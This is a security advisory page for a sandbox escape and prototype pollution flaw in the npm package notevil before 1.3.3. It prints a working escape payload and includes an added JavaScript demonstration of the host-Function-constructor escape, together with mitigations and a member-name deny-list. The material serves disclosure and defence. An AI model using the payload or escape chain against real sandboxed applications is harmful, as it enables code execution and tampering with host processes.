Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlneHItcmh4Ni00amd2
Sandbox Breakout / Prototype Pollution in notevil
Versions of notevil prior to 1.3.3 are vulnerable to a sandbox escape leading to prototype pollution. The package fails to restrict access to the main (host) context, allowing an attacker to add or modify an object's prototype.
Evaluating the payload
try{a[b];}catch(e){e.constructor.constructor('return __proto__.arguments.callee.__proto__.polluted=true')()}
adds the polluted property to Function. The caught exception is an ordinary host-realm Error object, so e.constructor.constructor is the host Function constructor, and code compiled with it runs in the host's global scope rather than inside the sandbox.
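The following is an added illustration of the escape primitive described above and is not notevil's code. It shows why any host-realm object that leaks into sandboxed code (here, a caught Error) hands the attacker the host Function constructor, how that becomes prototype pollution, and two checks a sandbox implementer can apply: returning prototype-less error records instead of host Error objects, and refusing member names such as constructor. The function names and the deny-list are assumptions of this example, not names from the package.

```javascript
// Added example (not notevil's code): why a host-realm object that leaks into
// sandboxed code is a full sandbox escape, and two checks that block this
// particular path. Error objects are used because the advisory's payload
// reaches the host through a caught exception.

'use strict';

// Step 1: any host object gives the attacker the host Function constructor:
// Error.prototype.constructor is Error, and Error.constructor is Function.
function reachHostFunction(leakedObject) {
  return leakedObject.constructor.constructor;
}

// Step 2: code compiled by that constructor runs in the host's global scope,
// outside whatever scope the sandbox interpreter was enforcing. The body is
// sloppy mode, so a bare `this` in it is the host global object.
function escapeToHostGlobal(leakedObject) {
  return reachHostFunction(leakedObject)('return this')();
}

// Step 3: with host code execution, polluting a shared prototype is one line.
// Returns whether a brand-new host function now carries the property, then
// removes it again so the demo leaves no residue in the process.
function pollutedViaLeakedError() {
  const leaked = (() => { try { null.x; } catch (e) { return e; } })();
  reachHostFunction(leaked)('Function.prototype.polluted = true')();
  const affected = (function () {}).polluted === true;
  delete Function.prototype.polluted;
  return affected;
}

// Mitigation A: never hand sandboxed code a host object. Convert exceptions
// into plain, prototype-less records before they become visible inside.
function sanitizeError(err) {
  const safe = Object.create(null); // no .constructor, no prototype chain
  safe.name = String(err && err.name);
  safe.message = String(err && err.message);
  return safe;
}

// Mitigation B: an interpreter that resolves member expressions itself can
// refuse the property names every known escape chain walks through.
// (Assumed deny-list for this example; deny-lists alone are fragile.)
const DENIED_MEMBERS = new Set(['constructor', '__proto__', 'prototype']);
function isDeniedMember(name) {
  return DENIED_MEMBERS.has(String(name));
}

// Regression check: does a value exposed to the sandbox reach the host
// Function constructor within two property hops?
function exposesHostFunction(value) {
  try {
    return value.constructor.constructor === Function;
  } catch (_) {
    return false;
  }
}

function main() {
  const leaked = new TypeError('boom'); // constructed stand-in for a leaked error
  console.log('host global reachable:', escapeToHostGlobal(leaked) === globalThis);
  console.log('Function.prototype polluted:', pollutedViaLeakedError());
  console.log('sanitized error still escapes:', exposesHostFunction(sanitizeError(leaked)));
  console.log('member "constructor" denied:', isDeniedMember('constructor'));
}
main();
```

The durable fix is mitigation A: the sandbox must not expose any host-realm object, because every such object reaches Function through its constructor chain. Mitigation B is a defence in depth only; name-based deny-lists have historically been bypassed through other reflective paths, and an in-process JavaScript interpreter should not be treated as a trust boundary for fully untrusted code.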
Recommendation
Upgrade to version 1.3.3 or later.
Permalink: https://github.com/advisories/GHSA-9gxr-rhx6-4jgv
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlneHItcmh4Ni00amd2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 4 years ago
Updated: about 2 years ago
Identifiers: GHSA-9gxr-rhx6-4jgv
References:
Blast Radius: 0.0
Affected Packages
npm:notevil
Dependent packages: 32
Dependent repositories: 1,049
Downloads: 30,929 last month
Affected Version Ranges: < 1.3.3
Fixed in: 1.3.3
All affected versions: 0.0.0, 0.0.1, 0.0.2, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, 0.8.0, 0.8.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1, 1.3.2
All unaffected versions: 1.3.3